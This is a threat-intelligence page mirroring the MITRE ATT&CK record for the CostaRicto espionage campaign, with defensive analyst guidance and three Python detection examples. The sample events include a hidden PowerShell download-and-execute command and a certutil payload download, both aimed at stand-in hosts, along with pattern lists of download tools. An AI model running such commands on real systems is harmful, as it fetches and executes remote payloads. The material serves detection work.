C0004: CostaRicto
CostaRicto was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. CostaRicto actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.[1]
Analyst context for executives and security teams
CostaRicto matters because ATT&CK describes it as a suspected hacker-for-hire cyber espionage campaign with worldwide targeting and many financial-institution victims. The defensive value is not a single indicator; it is validating whether the organization can see remote access abuse, proxy/tunnel command-and-control, transferred tools, scheduled tasks, PowerShell/offensive frameworks, and local data collection across the parts of the environment where those behaviors are relevant.
Executive priority
Treat this as a resilience and assurance use case for espionage-style intrusions: leadership should ask whether remote access, endpoint administration tools, egress paths, and sensitive-data locations are monitored well enough to support fast incident decisions. For financial services or globally distributed organizations, this campaign is useful for testing whether controls and audit evidence cover both commodity/open-source tooling and custom malware behaviors, rather than relying only on malware signatures.
Technical view
MITRE provides no campaign-level detection text, so SOC validation should be relationship-driven. The campaign is linked to PsExec, Tor, PowerSploit, PS1, CostaBricks, SombRAT, and techniques including External Remote Services, Scheduled Task, Network Service Discovery, Ingress Tool Transfer, Protocol Tunneling, Multi-hop Proxy, Data from Local System, and resource-development behaviors for domains, malware, and tools. Detection engineering should map these to available telemetry, especially Windows endpoint activity for PsExec, PowerSploit, scheduled tasks, and the listed Windows malware, plus network and remote-access logging for proxying, tunneling, Tor-like anonymity, and external service access.
Likely telemetry
- Remote access gateway, VPN, Citrix, WinRM/VNC or other external remote service authentication and session logs where deployed
- Endpoint process creation, command-line, script block or PowerShell logging, and parent-child process relationships
- Windows scheduled task creation, modification, and execution events
- Service creation or remote execution evidence associated with administrative tooling such as PsExec
- File creation/download events showing ingress tool transfer or staging of loaders/backdoors
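The second and fifth telemetry items meet in one record: a Windows Security 4698 event carries the full task XML, so the action a new scheduled task will run can be inspected at creation time, which is where the campaign's "scheduled tasks to download backdoor tools" procedure would first surface. The following is an added example of that triage and is not code from MITRE, BlackBerry or this page; the event records, task names, user names and URLs are constructed, and the list of download-capable binaries and patterns is an assumption to be extended locally.

```python
"""Triage Windows Security 4698 (scheduled task created) events for tasks
whose action fetches or stages a payload.  Added example, not from the
BlackBerry report or MITRE; the events, task names and URLs are constructed."""
import re
import xml.etree.ElementTree as ET

# Namespace of the task definition XML carried in the event's TaskContent field.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Binaries routinely abused to fetch files, and argument patterns that imply a download.
# Both lists are assumptions; extend them from local tooling inventory.
DOWNLOAD_BINARIES = {"certutil.exe", "bitsadmin.exe", "curl.exe", "wget.exe", "mshta.exe"}
DOWNLOAD_PATTERNS = [re.compile(p, re.IGNORECASE) for p in (
    r"downloadstring", r"downloadfile", r"invoke-webrequest", r"\biwr\b",
    r"start-bitstransfer", r"-urlcache", r"\btransfer\b", r"https?://")]
ENCODED_PS = re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\s", re.IGNORECASE)
USER_WRITABLE = re.compile(r"(\\users\\|\\programdata\\|\\appdata\\|%temp%|\\temp\\)", re.IGNORECASE)


def exec_actions(task_xml):
    """Return (command, arguments) for each <Exec> action in a task definition."""
    root = ET.fromstring(task_xml)
    actions = []
    for node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = node.findtext("t:Command", default="", namespaces=TASK_NS).strip()
        args = node.findtext("t:Arguments", default="", namespaces=TASK_NS).strip()
        actions.append((cmd, args))
    return actions


def classify_task(task_xml):
    """Return the reasons a task looks like payload staging (empty list = nothing notable)."""
    reasons = []
    for cmd, args in exec_actions(task_xml):
        exe = cmd.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
        line = f"{cmd} {args}"
        if exe in DOWNLOAD_BINARIES:
            reasons.append(f"download-capable binary {exe}")
        if any(p.search(line) for p in DOWNLOAD_PATTERNS):
            reasons.append("download indicator in command line")
        if exe in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(f" {args}"):
            reasons.append("encoded PowerShell command")
        if USER_WRITABLE.search(line):
            reasons.append("references a user-writable path")
    return reasons


def triage(events):
    """Map each 4698 event with findings to {user, reasons}, keyed by task name."""
    findings = {}
    for ev in events:
        if ev.get("EventID") != 4698:
            continue
        reasons = classify_task(ev["TaskContent"])
        if reasons:
            findings[ev["TaskName"]] = {"user": ev["SubjectUserName"], "reasons": reasons}
    return findings


def _task(command, arguments):
    """Build a minimal task definition, as TaskContent would carry it (constructed)."""
    return (f'<Task version="1.2" xmlns="{TASK_NS["t"]}"><Actions><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments>"
            "</Exec></Actions></Task>")


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    {"EventID": 4698, "SubjectUserName": "SYSTEM", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": _task(r"%windir%\system32\defrag.exe", "-c -h -o -$ -k")},
    {"EventID": 4698, "SubjectUserName": "jdoe", "TaskName": r"\OfficeUpdateSync",
     "TaskContent": _task("powershell.exe",
                          "-nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                          ".DownloadString('http://update.example.invalid/s')\"")},
    {"EventID": 4698, "SubjectUserName": "jdoe", "TaskName": r"\SvcHealth",
     "TaskContent": _task(r"C:\Windows\System32\certutil.exe",
                          r"-urlcache -split -f http://cdn.example.invalid/x C:\ProgramData\svc.exe")},
    {"EventID": 4702, "SubjectUserName": "jdoe", "TaskName": r"\SvcHealth",
     "TaskContent": _task("cmd.exe", "/c whoami")},  # task updated; out of scope here
]

if __name__ == "__main__":
    for name, hit in triage(SAMPLE_EVENTS).items():
        print(name, hit["user"], "; ".join(hit["reasons"]))
```

Two checks before relying on this: 4698 is only written when the "Audit Other Object Access Events" subcategory is enabled, so confirm it appears in the Security log on a test host, and compare against the Microsoft-Windows-TaskScheduler/Operational log (event 106, task registered), which records the registration but not the task XML. The benign defrag task produces no findings, which is the baseline the page asks for before escalating.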
Detection direction
- Validate coverage by behavior, not by campaign name: remote access abuse, tool transfer, scheduled task persistence/execution, PowerShell framework usage, network service discovery, local data access, and tunneled/proxied C2.
- Tune carefully for legitimate administration: PsExec, PowerShell, scheduled tasks, remote services, and SSH tunnels can be normal in enterprise operations, so detections should use context such as unusual source/destination pairs, new administrative relationships, abnormal timing, rare command lines, or unexpected egress paths.
- Check blind spots in encrypted and indirect network paths. Multi-hop proxies, Tor, and protocol tunneling reduce the value of simple IP reputation and may require DNS, proxy, flow, endpoint, and remote-access correlation.
- Use relationship context to hunt for combinations: a chain such as external service access followed by tool transfer, PowerShell or PsExec execution, scheduled task creation, service discovery, and local data access is more material than any single event.
- Because official detection guidance is not provided, require local baselining and validation with benign administrative activity before escalating detections into high-confidence alerts.
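The list above asks for three things at once: correlate stages on a host rather than alert on any one, suppress administrative relationships that are routine locally, and only escalate once a baseline exists. The block below is an added example of that hunt written by the editor; it is not MITRE, BlackBerry or Glexia code. Stage names, hosts, users, the baseline counts and the log lines are constructed, and the input format (pipe-separated, one normalised event per line) is an assumption standing in for whatever SIEM query produces the events.

```python
"""Hunt for the CostaRicto-style behaviour chain on a single host: external
remote access, tool transfer, scheduled task or PsExec execution, service
discovery and local data access inside one window, after suppressing
(stage, user, host) combinations that are routine in a local baseline.
Added example, not from MITRE or BlackBerry; all data below is constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Behaviour stages normalised from whatever telemetry produced them
# (VPN logs, process creation, 4698, PsExec service installs, flow data).
STAGES = {"remote_access", "ingress_tool", "sched_task", "psexec",
          "service_discovery", "local_data", "tunneled_c2"}


def parse_event(line):
    """Parse 'ISO-timestamp|host|user|stage|detail' into a dict (format is an assumption)."""
    ts, host, user, stage, detail = line.split("|", 4)
    if stage not in STAGES:
        raise ValueError(f"unknown stage {stage!r}")
    return {"ts": datetime.fromisoformat(ts), "host": host, "user": user,
            "stage": stage, "detail": detail}


def is_routine(event, baseline, min_seen=5):
    """True when this stage/user/host combination recurred in the baseline period."""
    return baseline.get((event["stage"], event["user"], event["host"]), 0) >= min_seen


def hunt(lines, baseline, window=timedelta(hours=24), min_stages=3):
    """Return one finding per host where at least min_stages distinct, non-routine
    stages occur within `window`; the finding lists the stages in time order."""
    by_host = defaultdict(list)
    for line in lines:
        if line.strip():
            event = parse_event(line.strip())
            if not is_routine(event, baseline):
                by_host[event["host"]].append(event)
    findings = []
    for host, events in by_host.items():
        events.sort(key=lambda e: e["ts"])
        best = {}
        for i, start in enumerate(events):          # slide the window over each start point
            seen = {}
            for event in events[i:]:
                if event["ts"] - start["ts"] > window:
                    break
                seen.setdefault(event["stage"], event)  # keep the first hit of each stage
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_stages:
            chain = sorted(best.values(), key=lambda e: e["ts"])
            findings.append({"host": host,
                             "stages": [e["stage"] for e in chain],
                             "users": sorted({e["user"] for e in chain}),
                             "start": chain[0]["ts"].isoformat(),
                             "end": chain[-1]["ts"].isoformat()})
    return findings


BASELINE = {  # constructed 30-day counts of (stage, user, host) during normal operations
    ("psexec", "svc_deploy", "FIN-APP-03"): 140,
    ("sched_task", "svc_deploy", "FIN-APP-03"): 31,
    ("remote_access", "svc_deploy", "FIN-APP-03"): 60,
}

SAMPLE_LOG = """\
2021-03-02T01:12:40|FIN-WS-07|contractor1|remote_access|VPN logon from 203.0.113.9
2021-03-02T01:20:05|FIN-WS-07|contractor1|ingress_tool|certutil -urlcache to C:\\ProgramData\\svc.exe
2021-03-02T01:25:11|FIN-WS-07|contractor1|sched_task|4698 \\SvcHealth created
2021-03-02T02:10:30|FIN-WS-07|contractor1|service_discovery|nmap -p 445,3389 10.20.0.0/24
2021-03-02T03:40:00|FIN-WS-07|contractor1|local_data|bulk read of \\\\fileshare\\finance
2021-03-02T02:00:00|FIN-APP-03|svc_deploy|remote_access|VPN logon from 198.51.100.4
2021-03-02T02:05:00|FIN-APP-03|svc_deploy|psexec|PSEXESVC installed
2021-03-02T02:06:00|FIN-APP-03|svc_deploy|sched_task|4698 \\Deploy\\Nightly created
2021-03-02T09:00:00|HR-WS-02|alice|remote_access|VPN logon from 192.0.2.55
2021-03-03T09:30:00|HR-WS-02|alice|local_data|opened personal OneDrive folder
"""

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOG.splitlines(), BASELINE):
        print(finding["host"], " -> ".join(finding["stages"]), finding["users"])
```

The deployment account on FIN-APP-03 performs the same PsExec and scheduled-task actions as the suspicious host, but every one of its events is suppressed by the baseline, so only FIN-WS-07 is reported. The baseline is the part to get right first: seed it from a quiet period, and treat a chain that appears on a host with an empty baseline as a tuning question, not an incident, until the routine combinations have been learned.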
Mitigation priorities
- Prioritize governance and monitoring of external remote services, including strong authentication policy, least-privilege access, session logging, and rapid review of unusual access patterns.
- Restrict and monitor administrative execution paths such as PsExec, PowerShell, and scheduled tasks; separate legitimate administration from unmanaged or unexpected use.
- Harden egress controls and logging so proxy, Tor, SSH tunnel, and protocol tunneling activity can be investigated instead of disappearing into generic encrypted traffic.
- Limit unnecessary internal service exposure and monitor discovery activity that could support lateral movement or target selection.
- Protect high-value local data stores with access controls, logging, and data-staging detection so collection activity can be confirmed during response.
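The egress item above is only useful if someone can actually review the SSH that leaves the network. The block below is an added example of that review over Zeek-style conn records, written by the editor and not taken from MITRE, BlackBerry or this page. It flags outbound SSH from hosts that are not approved jump hosts, SSH detected on a port other than 22, and long-lived sessions; the address ranges, jump-host list, thresholds and records are constructed, and the column layout is a simplified assumption rather than the full conn.log schema.

```python
"""Review outbound SSH in Zeek-style conn records for tunnel-like use.
Added example, not from MITRE or BlackBerry; address ranges, jump hosts,
thresholds and records are constructed."""
import ipaddress

# Organisation-defined internal ranges (assumption; do not rely on is_private,
# which also covers documentation ranges such as 203.0.113.0/24).
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"), ipaddress.ip_network("192.168.0.0/16")]
# Approved sources of outbound SSH (hypothetical); anything else is unexpected.
JUMP_HOSTS = {ipaddress.ip_address("10.20.1.5")}
LONG_SESSION_SECONDS = 3600

FIELDS = ("ts", "orig_h", "orig_p", "resp_h", "resp_p", "proto", "service",
          "duration", "orig_bytes", "resp_bytes")


def is_internal(ip):
    return any(ip in net for net in INTERNAL_NETS)


def parse_conn(line):
    """Parse a tab-separated conn record into typed fields ('-' means unset in Zeek)."""
    rec = dict(zip(FIELDS, line.rstrip("\n").split("\t")))
    rec["orig_h"] = ipaddress.ip_address(rec["orig_h"])
    rec["resp_h"] = ipaddress.ip_address(rec["resp_h"])
    rec["resp_p"] = int(rec["resp_p"])
    rec["duration"] = 0.0 if rec["duration"] == "-" else float(rec["duration"])
    return rec


def review_ssh(lines):
    """Return findings for internal-to-external SSH sessions with the reasons each was flagged."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        rec = parse_conn(line)
        # Zeek assigns `service` from protocol detection, so SSH on an odd port is still "ssh".
        if rec["service"] != "ssh" or not is_internal(rec["orig_h"]) or is_internal(rec["resp_h"]):
            continue
        reasons = []
        if rec["orig_h"] not in JUMP_HOSTS:
            reasons.append("source is not an approved jump host")
        if rec["resp_p"] != 22:
            reasons.append(f"ssh on non-standard port {rec['resp_p']}")
        if rec["duration"] >= LONG_SESSION_SECONDS:
            reasons.append(f"long-lived session ({rec['duration']:.0f}s)")
        if reasons:
            findings.append({"src": str(rec["orig_h"]),
                             "dst": f"{rec['resp_h']}:{rec['resp_p']}",
                             "reasons": reasons})
    return findings


SAMPLE_CONN = "\n".join([  # constructed records, columns as in FIELDS
    "1614647520.1\t10.20.1.5\t51234\t203.0.113.40\t22\ttcp\tssh\t412.5\t8100\t22400",       # jump host, short
    "1614647900.7\t10.20.4.17\t49812\t198.51.100.77\t443\ttcp\tssh\t19872.0\t31000\t904000",  # workstation, 443, 5.5 h
    "1614648100.0\t10.20.4.17\t49900\t10.20.0.9\t22\ttcp\tssh\t60.0\t500\t700",               # internal only
    "1614648200.0\t10.20.8.2\t50001\t203.0.113.40\t22\ttcp\tssh\t120.0\t900\t1200",           # non-jump host
])

if __name__ == "__main__":
    for f in review_ssh(SAMPLE_CONN.splitlines()):
        print(f["src"], "->", f["dst"], ";", "; ".join(f["reasons"]))
```

A reverse tunnel (remote port forwarding) looks like any other SSH session on the wire, which is why the checks are about who is talking, where to, on what port and for how long, not about content. Tor and multi-hop proxies need a different view (DNS, proxy logs, destination rarity) and are deliberately outside this block.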
Analyst notes and limits
The supplied ATT&CK object is a campaign record, not a procedure-by-procedure incident report. Its strongest decision value is as a control validation scenario for outsourced/espionage-style operations using a mix of custom malware, open-source tools, proxies, and SSH tunnels. Financial institutions and globally distributed organizations should give it higher review priority only to the extent their local risk profile, remote access exposure, and telemetry gaps match the described behaviors.
MITRE lists no platforms or tactics directly on the campaign and provides no official detection text. Platform references come from related software and techniques only. The supplied data supports historical campaign characterization and behavior mapping, but not claims of current activity, attribution beyond the suspected hacker-for-hire description, specific victim exposure, or guaranteed detection coverage.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1046 | Network Service Discovery | During CostaRicto, the threat actors employed nmap and pscan to scan target environments.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.[1] |
| Enterprise | T1090.003 | Proxy: Multi-hop Proxy | During CostaRicto, the threat actors used a layer of proxies to manage C2 communications.[1] |
| Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | During CostaRicto, the threat actors used scheduled tasks to download backdoor tools.[1] |
| Enterprise | T1588.002 | Obtain Capabilities: Tool | During CostaRicto, the threat actors obtained open source tools to use in their operations.[1] |
| Enterprise | T1133 | External Remote Services | During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.[1] |
| Enterprise | T1583.001 | Acquire Infrastructure: Domains | For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains.[1] |
| Enterprise | T1587.001 | Develop Capabilities: Malware | For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT.[1] |
| Enterprise | T1005 | Data from Local System | During CostaRicto, the threat actors collected data and files from compromised networks.[1] |
| Enterprise | T1572 | Protocol Tunneling | During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.[1] |
Groups, software, and campaigns
S0194: PowerSploit
PowerSploit is an open source, offensive security framework comprised of PowerShell modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. [1] [2] [3]
S0183: Tor
Tor is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. Tor utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. [1]
S0615: SombRAT
S0029: PsExec
S0614: CostaBricks
CostaBricks is a loader that was used to deploy 32-bit backdoors in the CostaRicto campaign.[1]
S0613: PS1
PS1 is a loader that was used to deploy 64-bit backdoors in the CostaRicto campaign.[1]
Object version and sync metadata
The fields below describe the current mirrored snapshot. Where Glexia retains multiple ATT&CK source imports, the table lists the same object across releases (bundle hashes and MITRE modification timestamps) so versions can be compared. For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 7cbfc177d16d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] BlackBerry CostaRicto November 2020: The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.
[2] mitre-attack C0004: MITRE ATT&CK, Campaign C0004: CostaRicto.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.